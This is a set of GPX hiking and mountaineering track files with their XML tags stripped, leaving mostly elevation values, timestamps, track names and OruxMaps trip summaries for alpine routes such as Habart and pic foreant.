+
+
+968.18
+
+
+993.18
+
+
+997.99
+
+
+1016.73
+
+
+1021.06
+
+
+1029.71
+
+
+1040.76
+
+
+1040.28
+
+
+1045.09
+
+
+1077.78
+
+
+1098.92
+
+
+1110.46
+
+
+1121.52
+
+
+1147.47
+
+
+1151.8
+
+
+1156.12
+
+
+1169.1
+
+
+1193.61
+
+
+1202.75
+
+
+1211.4
+
+
+1241.68
+
+
+1249.85
+
+
+1253.7
+
+
+1263.79
+
+
+1304.65
+
+
+1312.34
+
+
+1334.93
+
+
+1353.19
+
+
+1360.88
+
+
+1369.54
+
+
+1383.96
+
+
+1391.65
+
+
+1400.3
+
+
+1423.85
+
+
+1437.31
+
+
+1444.04
+
+
+1484.41
+
+
+1497.39
+
+
+1502.2
+
+
+1517.1
+
+
+1538.25
+
+
+1562.76
+
+
+1586.31
+
+
+1607.46
+
+
+1621.4
+
+
+1641.59
+
+
+1647.36
+
+
+1669.95
+
+
+1689.17
+
+
+1715.13
+
+
+1720.9
+
+
+1730.99
+
+
+1735.32
+
+
+1734.84
+
+
+1741.08
+ "
+"
+
+
+
+
+
+
+
+Track 12.09.2014 - Allgäulilücke
+
+
+
+1495.47
+
+
+1501.24
+
+
+1575.74
+
+
+1621.4
+
+
+1606.98
+
+
+1631.49
+
+
+1657.93
+
+
+1670.43
+
+
+1673.31
+
+
+1687.73
+
+
+1701.19
+
+
+1709.84
+
+
+1719.46
+
+
+1733.39
+
+
+1745.89
+
+
+1767.04
+
+
+1804.53
+
+
+1814.63
+
+
+1855.0
+
+
+1863.65
+
+
+1880.0
+
+
+1894.9
+
+
+1900.18
+
+
+1908.35
+
+
+1911.72
+
+
+1920.37
+
+
+1913.16
+
+
+1902.59
+
+
+1889.61
+
+
+1870.86
+
+
+1863.65
+
+
+1855.48
+
+
+1828.56
+
+
+1818.47
+
+
+1805.01
+
+
+1766.56
+
+
+1742.53
+
+
+1735.8
+
+
+1726.67
+
+
+1717.53
+
+
+1707.44
+
+
+1700.23
+
+
+1693.5
+
+
+1669.47
+
+
+1661.3
+
+
+1652.64
+
+
+1628.13
+
+
+1616.59
+
+
+1573.82
+
+
+1535.84
+
+
+1498.35
+
+
+1492.58
+ "
+"
+
+
+Habart
+
+
+
+
+
+OruxMaps
+2015-07-03T07:09:15Z
+
+
+Habart
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Habart</h2><br /><p>Startzeit: 07/03/2015 09:09</p><p>Zielzeit: 07/03/2015 11:38</p><p>Strecke: 3,5km (02:29)</p><p>Bewegungszeit: 01:18</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,7km/h</p><p>Max. Geschwindigkeit: 6,5km/h</p><p>Minimale Höhe: 1618m</p><p>Maximale Höhe: 2301m</p><p>Steig-Geschw.: 417,3m/h</p><p>Sink-Geschw.: -540,4m/h</p><p>Aufstieg: 714m</p><p>Abstieg: -293m</p><p>Steigzeit: 01:42</p><p>Sinkzeit: 00:32</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1618.0
+2015-07-03T07:09:13Z
+
+
+1618.9
+2015-07-03T07:12:01Z
+
+
+1636.99
+2015-07-03T07:14:36Z
+
+
+1639.0
+2015-07-03T07:15:04Z
+
+
+1653.87
+2015-07-03T07:16:13Z
+
+
+1665.99
+2015-07-03T07:17:37Z
+
+
+1673.24
+2015-07-03T07:18:26Z
+
+
+1687.25
+2015-07-03T07:19:36Z
+
+
+1704.75
+2015-07-03T07:22:30Z
+
+
+1708.85
+2015-07-03T07:23:55Z
+
+
+1741.38
+2015-07-03T07:27:09Z
+
+
+1770.39
+2015-07-03T07:31:42Z
+
+
+1793.99
+2015-07-03T07:35:06Z
+
+
+1804.97
+2015-07-03T07:35:57Z
+
+
+1819.83
+2015-07-03T07:39:01Z
+
+
+1831.37
+2015-07-03T07:41:27Z
+
+
+1847.8
+2015-07-03T07:43:24Z
+
+
+1852.89
+2015-07-03T07:44:23Z
+
+
+1891.58
+2015-07-03T07:47:56Z
+
+
+1932.9
+2015-07-03T07:54:15Z
+
+
+1960.24
+2015-07-03T07:58:58Z
+
+
+1970.27
+2015-07-03T07:59:57Z
+
+
+1986.99
+2015-07-03T08:02:39Z
+
+
+1998.43
+2015-07-03T08:06:06Z
+
+
+2011.75
+2015-07-03T08:06:46Z
+
+
+2040.31
+2015-07-03T08:11:02Z
+
+
+2068.46
+2015-07-03T08:14:47Z
+
+
+2088.46
+2015-07-03T08:18:18Z
+
+
+2139.44
+2015-07-03T08:27:43Z
+
+
+2162.8
+2015-07-03T08:30:20Z
+
+
+2161.47
+2015-07-03T08:31:57Z
+
+
+2165.6
+2015-07-03T08:45:54Z
+
+
+2205.86
+2015-07-03T08:50:25Z
+
+
+2277.5
+2015-07-03T09:00:49Z
+
+
+2289.25
+2015-07-03T09:02:22Z
+
+
+2301.34
+2015-07-03T09:04:07Z
+
+
+2285.49
+2015-07-03T09:09:22Z
+
+
+2252.37
+2015-07-03T09:13:01Z
+
+
+2245.49
+2015-07-03T09:14:05Z
+
+
+2206.9
+2015-07-03T09:15:56Z
+
+
+2167.87
+2015-07-03T09:18:25Z
+
+
+2182.03
+2015-07-03T09:20:39Z
+
+
+2149.6
+2015-07-03T09:22:25Z
+
+
+2096.87
+2015-07-03T09:30:55Z
+
+
+2070.04
+2015-07-03T09:33:14Z
+
+
+2039.9
+2015-07-03T09:36:28Z
+
+
+2016.13
+2015-07-03T09:38:20Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-26T17:32:37Z
+
+2015-06-26 19:32:35
+
+
+
+
+
+
+1554.85
+2015-06-26T14:11:52Z
+
+
+1567.99
+2015-06-26T14:13:30Z
+
+
+1588.43
+2015-06-26T14:15:06Z
+
+
+1606.56
+2015-06-26T14:16:34Z
+
+
+1638.18
+2015-06-26T14:19:09Z
+
+
+1656.6
+2015-06-26T14:20:33Z
+
+
+1675.01
+2015-06-26T14:22:03Z
+
+
+1716.25
+2015-06-26T14:35:03Z
+
+
+1740.64
+2015-06-26T14:47:07Z
+
+
+1776.18
+2015-06-26T14:58:44Z
+
+
+1803.65
+2015-06-26T15:08:21Z
+
+
+1858.58
+2015-06-26T15:40:55Z
+
+
+1820.76
+2015-06-26T15:43:54Z
+
+
+1809.8
+2015-06-26T15:45:06Z
+
+
+1790.17
+2015-06-26T15:48:14Z
+
+
+1753.58
+2015-06-26T15:56:37Z
+
+
+1737.96
+2015-06-26T16:01:53Z
+
+
+1750.02
+2015-06-26T16:04:43Z
+
+
+1694.74
+2015-06-26T16:08:56Z
+
+
+1688.05
+2015-06-26T16:14:26Z
+
+
+1710.9
+2015-06-26T16:19:20Z
+
+
+1753.56
+2015-06-26T16:24:44Z
+
+
+1788.81
+2015-06-26T16:30:32Z
+
+
+1792.09
+2015-06-26T16:31:59Z
+
+
+1809.55
+2015-06-26T16:37:45Z
+
+
+1782.96
+2015-06-26T16:39:33Z
+
+
+1756.93
+2015-06-26T16:40:49Z
+
+
+1705.65
+2015-06-26T16:44:05Z
+
+
+1673.04
+2015-06-26T16:47:35Z
+
+
+1633.79
+2015-06-26T16:49:46Z
+
+
+1618.6
+2015-06-26T16:50:50Z
+
+
+1598.47
+2015-06-26T16:52:00Z
+
+
+1561.52
+2015-06-26T16:54:37Z
+
+
+1545.96
+2015-06-26T16:58:32Z
+
+
+1548.05
+2015-06-26T16:59:36Z
+
+
+1548.54
+2015-06-26T17:00:50Z
+
+
+1550.35
+2015-06-26T17:01:34Z
+
+
+1539.78
+2015-06-26T17:04:43Z
+
+
+1501.15
+2015-06-26T17:06:57Z
+
+
+1484.71
+2015-06-26T17:08:00Z
+
+
+1474.5
+2015-06-26T17:09:09Z
+
+
+1461.02
+2015-06-26T17:10:21Z
+
+
+1441.75
+2015-06-26T17:11:31Z
+
+
+1424.05
+2015-06-26T17:12:48Z
+
+
+1404.72
+2015-06-26T17:14:06Z
+
+
+1355.26
+2015-06-26T17:17:10Z
+
+
+1332.77
+2015-06-26T17:18:16Z
+
+
+1309.39
+2015-06-26T17:19:18Z
+
+
+1295.8
+2015-06-26T17:20:11Z
+
+
+1280.64
+2015-06-26T17:21:08Z
+
+
+1227.09
+2015-06-26T17:26:41Z
+
+
+1215.43
+2015-06-26T17:27:26Z
+
+
+1206.31
+2015-06-26T17:28:14Z
+
+
+1195.76
+2015-06-26T17:28:58Z
+
+
+1173.85
+2015-06-26T17:30:38Z
+
+
+1169.01
+2015-06-26T17:31:30Z
+
+
+1169.98
+2015-06-26T17:32:32Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2016-05-29T19:37:52Z
+
+GPSies Track on GPSies.com
+
+
+
+982.0
+2010-01-01T00:00:00Z
+
+
+1014.0
+2010-01-01T00:01:37Z
+
+
+1071.0
+2010-01-01T00:02:50Z
+
+
+1088.0
+2010-01-01T00:03:31Z
+
+
+1117.0
+2010-01-01T00:04:05Z
+
+
+1167.0
+2010-01-01T00:05:37Z
+
+
+1165.0
+2010-01-01T00:06:15Z
+
+
+1149.0
+2010-01-01T00:06:50Z
+
+
+1215.0
+2010-01-01T00:07:54Z
+
+
+1274.0
+2010-01-01T00:08:32Z
+
+
+1282.0
+2010-01-01T00:08:49Z
+
+
+1310.0
+2010-01-01T00:09:11Z
+
+
+1351.0
+2010-01-01T00:09:45Z
+
+
+1373.0
+2010-01-01T00:10:45Z
+
+
+1429.0
+2010-01-01T00:11:58Z
+
+
+1462.0
+2010-01-01T00:12:25Z
+
+
+1494.0
+2010-01-01T00:13:38Z
+
+
+1560.0
+2010-01-01T00:14:34Z
+
+
+1647.0
+2010-01-01T00:15:43Z
+
+
+1665.0
+2010-01-01T00:16:35Z
+
+
+1725.0
+2010-01-01T00:17:24Z
+
+
+1752.0
+2010-01-01T00:18:06Z
+
+
+1811.0
+2010-01-01T00:19:18Z
+
+
+1809.0
+2010-01-01T00:19:53Z
+
+
+1843.0
+2010-01-01T00:20:17Z
+
+
+1883.0
+2010-01-01T00:20:43Z
+
+
+1888.0
+2010-01-01T00:21:26Z
+
+
+1955.0
+2010-01-01T00:23:27Z
+
+
+1903.0
+2010-01-01T00:24:17Z
+
+
+1886.0
+2010-01-01T00:24:30Z
+
+
+1869.0
+2010-01-01T00:24:51Z
+
+
+1813.0
+2010-01-01T00:25:46Z
+
+
+1792.0
+2010-01-01T00:26:04Z
+
+
+1763.0
+2010-01-01T00:26:25Z
+
+
+1739.0
+2010-01-01T00:26:51Z
+
+
+1717.0
+2010-01-01T00:27:13Z
+
+
+1617.0
+2010-01-01T00:28:48Z
+
+
+1601.0
+2010-01-01T00:29:07Z
+
+
+1550.0
+2010-01-01T00:29:31Z
+
+
+1534.0
+2010-01-01T00:29:51Z
+
+
+1530.0
+2010-01-01T00:30:09Z
+
+
+1413.0
+2010-01-01T00:31:28Z
+
+
+1393.0
+2010-01-01T00:31:56Z
+
+
+1363.0
+2010-01-01T00:32:50Z
+
+
+1308.0
+2010-01-01T00:33:50Z
+
+
+1277.0
+2010-01-01T00:34:08Z
+
+
+1248.0
+2010-01-01T00:34:34Z
+
+
+1243.0
+2010-01-01T00:34:48Z
+
+
+1225.0
+2010-01-01T00:35:14Z
+
+
+1115.0
+2010-01-01T00:36:54Z
+
+
+1129.0
+2010-01-01T00:37:32Z
+
+
+1107.0
+2010-01-01T00:37:54Z
+
+
+1078.0
+2010-01-01T00:38:08Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+KOMPASS Digital Map Track
+
+
+
+
+2015-12-28T15:07:41Z
+
+
+Leobner Mauer
+
+
+
+
+
+
+1226.67
+1970-01-01T00:00:00Z
+
+
+1223.12
+1970-01-01T00:00:00Z
+
+
+1224.83
+1970-01-01T00:00:00Z
+
+
+1228.15
+1970-01-01T00:00:00Z
+
+
+1254.79
+1970-01-01T00:00:00Z
+
+
+1267.78
+1970-01-01T00:00:00Z
+
+
+1289.71
+1970-01-01T00:00:00Z
+
+
+1288.23
+1970-01-01T00:00:00Z
+
+
+1319.06
+1970-01-01T00:00:00Z
+
+
+1337.72
+1970-01-01T00:00:00Z
+
+
+1360.7
+1970-01-01T00:00:00Z
+
+
+1345.0
+1970-01-01T00:00:00Z
+
+
+1350.05
+1970-01-01T00:00:00Z
+
+
+1360.48
+1970-01-01T00:00:00Z
+
+
+1389.79
+1970-01-01T00:00:00Z
+
+
+1392.16
+1970-01-01T00:00:00Z
+
+
+1441.04
+1970-01-01T00:00:00Z
+
+
+1477.04
+1970-01-01T00:00:00Z
+
+
+1517.13
+1970-01-01T00:00:00Z
+
+
+1608.63
+1970-01-01T00:00:00Z
+
+
+1618.62
+1970-01-01T00:00:00Z
+
+
+1619.39
+1970-01-01T00:00:00Z
+
+
+1672.23
+1970-01-01T00:00:00Z
+
+
+1661.02
+1970-01-01T00:00:00Z
+
+
+1667.7
+1970-01-01T00:00:00Z
+
+
+1700.46
+1970-01-01T00:00:00Z
+
+
+1701.06
+1970-01-01T00:00:00Z
+
+
+1757.65
+1970-01-01T00:00:00Z
+
+
+1779.88
+1970-01-01T00:00:00Z
+
+
+1775.81
+1970-01-01T00:00:00Z
+
+
+1760.42
+1970-01-01T00:00:00Z
+
+
+1804.05
+1970-01-01T00:00:00Z
+
+
+1820.85
+1970-01-01T00:00:00Z
+
+
+1838.74
+1970-01-01T00:00:00Z
+
+
+1839.43
+1970-01-01T00:00:00Z
+
+
+1860.0
+1970-01-01T00:00:00Z
+
+
+1854.34
+1970-01-01T00:00:00Z
+
+
+1839.43
+1970-01-01T00:00:00Z
+
+
+1838.54
+1970-01-01T00:00:00Z
+
+
+1822.63
+1970-01-01T00:00:00Z
+
+
+1815.49
+1970-01-01T00:00:00Z
+
+
+1769.57
+1970-01-01T00:00:00Z
+
+
+1773.62
+1970-01-01T00:00:00Z
+
+
+1780.49
+1970-01-01T00:00:00Z
+
+
+1758.13
+1970-01-01T00:00:00Z
+
+
+1713.56
+1970-01-01T00:00:00Z
+
+
+1696.25
+1970-01-01T00:00:00Z
+
+
+1667.31
+1970-01-01T00:00:00Z
+
+
+1660.89
+1970-01-01T00:00:00Z
+
+
+1665.3
+1970-01-01T00:00:00Z
+
+
+1659.24
+1970-01-01T00:00:00Z
+
+
+1663.79
+1970-01-01T00:00:00Z
+
+
+1648.24
+1970-01-01T00:00:00Z
+
+
+1623.39
+1970-01-01T00:00:00Z
+
+
+1592.97
+1970-01-01T00:00:00Z
+
+
+1592.45
+1970-01-01T00:00:00Z
+
+
+1579.92
+1970-01-01T00:00:00Z
+
+
+1572.35
+1970-01-01T00:00:00Z
+
+
+1581.5
+1970-01-01T00:00:00Z
+
+
+1589.17
+1970-01-01T00:00:00Z
+
+
+1580.07
+1970-01-01T00:00:00Z
+
+
+1572.1
+1970-01-01T00:00:00Z
+
+
+1539.59
+1970-01-01T00:00:00Z
+
+
+1533.37
+1970-01-01T00:00:00Z
+
+
+1515.59
+1970-01-01T00:00:00Z
+
+
+1487.09
+1970-01-01T00:00:00Z
+
+
+1479.05
+1970-01-01T00:00:00Z
+
+
+1460.89
+1970-01-01T00:00:00Z
+
+
+1412.52
+1970-01-01T00:00:00Z
+
+
+1397.39
+1970-01-01T00:00:00Z
+
+
+1374.47
+1970-01-01T00:00:00Z
+
+
+1323.56
+1970-01-01T00:00:00Z
+
+
+1316.16
+1970-01-01T00:00:00Z
+
+
+1278.36
+1970-01-01T00:00:00Z
+
+
+1249.72
+1970-01-01T00:00:00Z
+
+
+1231.28
+1970-01-01T00:00:00Z
+
+
+1227.86
+1970-01-01T00:00:00Z
+
+
+1224.81
+1970-01-01T00:00:00Z
+
+
+1224.73
+1970-01-01T00:00:00Z
+ "
+"
+
+2018-03-09T07:55:56Z
+
+
+<p>Orario inizio: 03/08/2018 09:07<
+
+
+1276.900024
+2018-03-08T08:10:52Z
+
+1292.880005
+2018-03-08T08:14:54Z
+
+1298.439941
+2018-03-08T08:16:02Z
+
+1308.130005
+2018-03-08T08:18:08Z
+
+1316.5
+2018-03-08T08:18:41Z
+
+1404.170044
+2018-03-08T08:36:58Z
+
+1401.089966
+2018-03-08T08:37:30Z
+
+1387.030029
+2018-03-08T08:39:01Z
+
+1384.680054
+2018-03-08T08:42:48Z
+
+1371.480103
+2018-03-08T08:44:41Z
+
+1344.619995
+2018-03-08T08:49:38Z
+
+1332.080078
+2018-03-08T08:54:15Z
+
+1307.97998
+2018-03-08T09:05:05Z
+
+1279.790039
+2018-03-08T09:07:58Z
+
+1255.450073
+2018-03-08T09:11:04Z
+
+1254.439941
+2018-03-08T09:13:15Z
+
+1256.380005
+2018-03-08T09:15:13Z
+
+1267.469971
+2018-03-08T09:15:28Z
+
+1259.73999
+2018-03-08T09:18:06Z
+
+1278.02002
+2018-03-08T09:31:34Z
+
+1281.579956
+2018-03-08T09:36:12Z
+
+1296.079956
+2018-03-08T09:50:14Z
+
+1298.570068
+2018-03-08T10:05:26Z
+
+1271.72998
+2018-03-08T10:15:47Z
+
+1239.570068
+2018-03-08T10:17:44Z
+
+1244.089966
+2018-03-08T10:19:36Z
+
+1238.040039
+2018-03-08T10:21:10Z
+
+1232.619995
+2018-03-08T10:21:38Z
+
+1241.950073
+2018-03-08T10:22:35Z
+
+1246.670044
+2018-03-08T10:23:17Z
+
+1245.680054
+2018-03-08T10:23:49Z
+
+1239.719971
+2018-03-08T10:25:03Z
+
+1232.069946
+2018-03-08T10:26:01Z
+
+1228.73999
+2018-03-08T10:26:33Z
+
+1231.589966
+2018-03-08T10:28:13Z
+
+1222.109985
+2018-03-08T10:30:34Z
+
+1216.109985
+2018-03-08T10:31:10Z
+
+1225.76001
+2018-03-08T10:32:20Z
+
+1228.25
+2018-03-08T10:33:19Z
+
+1234.820068
+2018-03-08T10:33:58Z
+
+1242.700073
+2018-03-08T10:34:39Z
+
+1241.950073
+2018-03-08T10:35:21Z
+
+1245.409912
+2018-03-08T10:35:52Z
+
+1246.280029
+2018-03-08T10:36:42Z
+
+1244.869995
+2018-03-08T10:38:04Z
+
+1243.719971
+2018-03-08T10:39:54Z
+
+1246.200073
+2018-03-08T10:40:34Z
+
+1256.040039
+2018-03-08T10:42:57Z
+
+1245.5
+2018-03-08T10:44:56Z
+
+1256.099976
+2018-03-08T10:46:32Z
+
+1266.709961
+2018-03-08T10:47:24Z
+
+1287.359985
+2018-03-08T10:48:26Z "
+"
+
+
+napf 2018-02-18
+
+
+
+
+
+
+napf 2018-02-18
+
+
+
+924.0
+
+
+929.9999828427503
+
+
+934.2000103560853
+
+
+945.7999687244477
+
+
+955.0999730169067
+
+
+965.4000592276591
+
+
+995.6000328845143
+
+
+1007.0854213870643
+
+
+1019.5712783158515
+
+
+1041.4
+
+
+1042.4
+
+
+1059.088820825202
+
+
+1064.9999750419286
+
+
+1090.500052730699
+
+
+1104.7999793008066
+
+
+1138.800077577396
+
+
+1144.0999559769982
+
+
+1163.8000083329696
+
+
+1179.299840340542
+
+
+1193.6
+
+
+1215.499902523376
+
+
+1222.7000504453315
+
+
+1223.479271767998
+
+
+1227.999862417147
+
+
+1233.099910249087
+
+
+1238.9
+
+
+1244.5999446502583
+
+
+1249.1
+
+
+1255.5999921683238
+
+
+1261.6044970634428
+
+
+1265.5000480499186
+
+
+1269.699954422353
+
+
+1274.0951842991358
+
+
+1276.9
+
+
+1289.0
+
+
+1294.4
+
+
+1300.8
+
+
+1307.6000355715582
+
+
+1313.5999297987867
+
+
+1328.0
+
+
+1336.900046926245
+
+
+1343.300034561455
+
+
+1350.2
+
+
+1359.2000218866633
+
+
+1374.9000318044395
+
+
+1384.8999893467226
+
+
+1389.599780446481
+
+
+1394.1999112485576
+
+
+1403.2
+
+
+1399.6000026021495
+
+
+1398.700008605142
+
+
+1394.1999112485757
+
+
+1389.5997804464537
+
+
+1386.2
+
+
+1374.900031804466
+
+
+1360.3000189506479
+
+
+1350.2
+
+
+1343.3000313781818
+
+
+1334.8000863443701
+
+
+1325.100125715011
+
+
+1310.432893798041
+
+
+1269.200133799916
+
+
+1260.7
+
+
+1253.8000366631375
+
+
+1215.9999320244526
+
+
+1209.5000625154348
+
+
+1202.2
+
+
+1174.8000339241698
+
+
+1154.2000078332296
+
+
+1143.1999987113716
+
+
+1120.4999798083584
+
+
+1093.5998965895826
+
+
+1081.6467028155917
+
+
+1073.3999365217678
+
+
+1022.4999343355462
+
+
+1007.7
+
+
+1000.5999641596956
+
+
+973.1
+
+
+945.8999681842329
+
+
+941.2
+
+
+931.2000213152802
+
+
+923.4
+ "
+"
+
+
+pic foreant
+
+
+
+
+
+OruxMaps
+2015-09-23T10:01:07Z
+
+
+pic foreant
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pic foreant</h2><br /><p>Startzeit: 09/23/2015 12:01</p><p>Zielzeit: 09/23/2015 14:17</p><p>Strecke: 4,4km (02:16)</p><p>Bewegungszeit: 01:32</p><p>Ø-Geschwindigkeit: 1,9km/h</p><p>Netto-Geschwindigkeit: 2,9km/h</p><p>Max. Geschwindigkeit: 6,3km/h</p><p>Minimale Höhe: 2574m</p><p>Maximale Höhe: 3028m</p><p>Steig-Geschw.: 374m/h</p><p>Sink-Geschw.: -443,1m/h</p><p>Aufstieg: 456m</p><p>Abstieg: -457m</p><p>Steigzeit: 01:13</p><p>Sinkzeit: 01:01</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2579.77
+2015-09-23T10:01:08Z
+
+
+2582.39
+2015-09-23T10:04:45Z
+
+
+2583.13
+2015-09-23T10:05:16Z
+
+
+2588.73
+2015-09-23T10:05:45Z
+
+
+2603.42
+2015-09-23T10:09:07Z
+
+
+2626.79
+2015-09-23T10:12:15Z
+
+
+2638.53
+2015-09-23T10:14:16Z
+
+
+2636.88
+2015-09-23T10:14:41Z
+
+
+2665.76
+2015-09-23T10:17:42Z
+
+
+2680.66
+2015-09-23T10:18:50Z
+
+
+2678.66
+2015-09-23T10:22:46Z
+
+
+2670.17
+2015-09-23T10:23:35Z
+
+
+2704.47
+2015-09-23T10:26:24Z
+
+
+2731.14
+2015-09-23T10:29:09Z
+
+
+2739.11
+2015-09-23T10:30:33Z
+
+
+2757.64
+2015-09-23T10:32:49Z
+
+
+2790.34
+2015-09-23T10:36:16Z
+
+
+2795.75
+2015-09-23T10:36:53Z
+
+
+2809.26
+2015-09-23T10:38:24Z
+
+
+2860.18
+2015-09-23T10:43:20Z
+
+
+2893.26
+2015-09-23T10:49:24Z
+
+
+2907.14
+2015-09-23T10:53:24Z
+
+
+2932.24
+2015-09-23T10:56:30Z
+
+
+2966.54
+2015-09-23T11:00:00Z
+
+
+2965.7
+2015-09-23T11:01:18Z
+
+
+2962.77
+2015-09-23T11:01:44Z
+
+
+2973.76
+2015-09-23T11:03:14Z
+
+
+2996.64
+2015-09-23T11:06:26Z
+
+
+3028.64
+2015-09-23T11:16:32Z
+
+
+3023.51
+2015-09-23T11:25:34Z
+
+
+3016.67
+2015-09-23T11:26:40Z
+
+
+3010.64
+2015-09-23T11:28:14Z
+
+
+3001.77
+2015-09-23T11:29:03Z
+
+
+2982.65
+2015-09-23T11:31:25Z
+
+
+2972.51
+2015-09-23T11:32:38Z
+
+
+2962.7
+2015-09-23T11:34:18Z
+
+
+2938.14
+2015-09-23T11:36:49Z
+
+
+2920.64
+2015-09-23T11:39:02Z
+
+
+2917.16
+2015-09-23T11:39:42Z
+
+
+2869.64
+2015-09-23T11:45:40Z
+
+
+2849.65
+2015-09-23T11:47:27Z
+
+
+2816.67
+2015-09-23T11:50:59Z
+
+
+2809.77
+2015-09-23T11:51:27Z
+
+
+2799.65
+2015-09-23T11:52:26Z
+
+
+2775.89
+2015-09-23T11:55:14Z
+
+
+2758.64
+2015-09-23T11:56:49Z
+
+
+2744.64
+2015-09-23T11:58:11Z
+
+
+2718.51
+2015-09-23T12:00:45Z
+
+
+2688.77
+2015-09-23T12:04:16Z
+
+
+2676.2
+2015-09-23T12:06:26Z
+
+
+2653.63
+2015-09-23T12:08:35Z
+
+
+2650.66
+2015-09-23T12:09:16Z
+
+
+2643.74
+2015-09-23T12:10:10Z
+
+
+2631.64
+2015-09-23T12:11:33Z
+
+
+2622.67
+2015-09-23T12:12:41Z
+
+
+2594.74
+2015-09-23T12:15:16Z
+
+
+2582.17
+2015-09-23T12:16:16Z
+
+
+2578.76
+2015-09-23T12:17:07Z
+
+
+2575.67
+2015-09-23T12:17:44Z
+ "
+"
+
+
+Il Colle - Cima di Morissolo 25/apr/2016 11:14:29
+
+
+1196.0
+2016-04-25T09:14:29Z
+
+1248.0
+2016-04-25T09:17:58Z
+
+1259.0
+2016-04-25T09:19:22Z
+
+1242.0
+2016-04-25T09:20:38Z
+
+1245.0
+2016-04-25T09:21:40Z
+
+1264.0
+2016-04-25T09:23:05Z
+
+1260.0
+2016-04-25T09:24:45Z
+
+1274.0
+2016-04-25T09:27:27Z
+
+1259.0
+2016-04-25T09:29:51Z
+
+1261.0
+2016-04-25T09:31:27Z
+
+1262.0
+2016-04-25T09:32:06Z
+
+1273.0
+2016-04-25T09:33:17Z
+
+1267.0
+2016-04-25T09:34:03Z
+
+1254.0
+2016-04-25T09:35:04Z
+
+1250.0
+2016-04-25T09:35:45Z
+
+1258.0
+2016-04-25T09:38:37Z
+
+1288.0
+2016-04-25T09:48:06Z
+
+1287.0
+2016-04-25T09:50:38Z
+
+1280.0
+2016-04-25T09:57:12Z
+
+1307.0
+2016-04-25T10:02:11Z
+
+1321.0
+2016-04-25T10:06:27Z "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-28T19:33:50Z
+
+
+Haltestelle Bus bis Haltestelle Bus 1
+
+
+
+
+
+2030.609375
+2015-07-28T11:30:09Z
+Haltestelle Bus
+Haltestelle Bus
+Haltestelle Bus
+
+Waypoint
+
+
+
+
+2032.109375
+2015-07-28T11:30:38Z
+Silvretta Straße
+Silvretta Straße
+Silvretta Straße
+
+Waypoint
+
+
+
+
+2028.0859375
+2015-07-28T11:30:42Z
+Pfad
+Pfad
+Pfad
+
+Waypoint
+
+
+
+
+2114.4921875
+2015-07-28T11:30:46Z
+Pfad1
+Pfad
+Pfad
+
+Waypoint
+
+
+
+
+2649.48046875
+2015-07-28T11:30:49Z
+Radsattel (2652m)
+Radsattel (2652m)
+Radsattel (2652m)
+
+Waypoint
+
+
+
+
+2446.41796875
+2015-07-28T11:30:58Z
+Hütte
+Hütte
+Hütte
+
+Waypoint
+
+
+
+
+2073.2109375
+2015-07-28T11:31:07Z
+Brücke Klostertaler Bach
+Brücke Klostertaler Bach
+Brücke Klostertaler Bach
+
+Waypoint
+
+
+
+
+2030.609375
+2015-07-28T11:30:09Z
+Haltestelle Bus
+Haltestelle Bus
+Haltestelle Bus
+
+Waypoint
+
+
+ "
+"
+
+
+
+
+
+
+2017-10-10T10:16:35Z
+
+
+
+
+
+407.0
+2017-10-10T10:16:35Z
+
+
+
+
+0.000000
+
+408.0
+2017-10-10T10:20:17Z
+
+
+
+
+37.662460
+
+407.0
+2017-10-10T10:21:40Z
+
+
+
+
+34.278702
+
+407.0
+2017-10-10T10:27:10Z
+
+
+
+
+17.885040
+
+415.0
+2017-10-10T10:28:10Z
+
+
+
+
+3.392731
+
+433.0
+2017-10-10T10:31:11Z
+
+
+
+
+6.717377
+
+441.0
+2017-10-10T10:32:43Z
+
+
+
+
+27.450348
+
+444.0
+2017-10-10T10:33:21Z
+
+
+
+
+18.720703
+
+440.0
+2017-10-10T10:36:08Z
+
+
+
+
+36.803650
+
+448.0
+2017-10-10T10:38:28Z
+
+
+
+
+3.169128
+
+447.0
+2017-10-10T10:40:56Z
+
+
+
+
+0.000000 "
+"
+
+
+
+
+
+
+Garmin International
+2014-10-03T10:58:02Z
+
+MAMBRETTI3 12:57:20
+
+
+
+
+
+
+1220.05
+2014-10-03T08:47:05Z
+
+
+1226.3
+2014-10-03T08:55:10Z
+
+
+1230.62
+2014-10-03T08:58:23Z
+
+
+1240.24
+2014-10-03T08:59:22Z
+
+
+1238.8
+2014-10-03T09:00:11Z
+
+
+1248.41
+2014-10-03T09:02:07Z
+
+
+1249.37
+2014-10-03T09:03:22Z
+
+
+1250.33
+2014-10-03T09:04:06Z
+
+
+1260.43
+2014-10-03T09:05:55Z
+
+
+1265.71
+2014-10-03T09:06:39Z
+
+
+1276.29
+2014-10-03T09:07:25Z
+
+
+1276.29
+2014-10-03T09:07:42Z
+
+
+1292.15
+2014-10-03T09:08:47Z
+
+
+1299.36
+2014-10-03T09:09:32Z
+
+
+1304.17
+2014-10-03T09:10:35Z
+
+
+1304.17
+2014-10-03T09:10:55Z
+
+
+1358.96
+2014-10-03T09:11:36Z
+
+
+1369.54
+2014-10-03T09:11:55Z
+
+
+1370.98
+2014-10-03T09:12:38Z
+
+
+1414.72
+2014-10-03T09:14:03Z
+
+
+1413.76
+2014-10-03T09:14:21Z
+
+
+1412.79
+2014-10-03T09:15:03Z
+
+
+1412.79
+2014-10-03T09:15:41Z
+
+
+1429.62
+2014-10-03T09:16:42Z
+
+
+1404.14
+2014-10-03T09:18:39Z
+
+
+1398.37
+2014-10-03T09:20:45Z
+
+
+1425.77
+2014-10-03T09:22:32Z
+
+
+1428.66
+2014-10-03T09:23:49Z
+
+
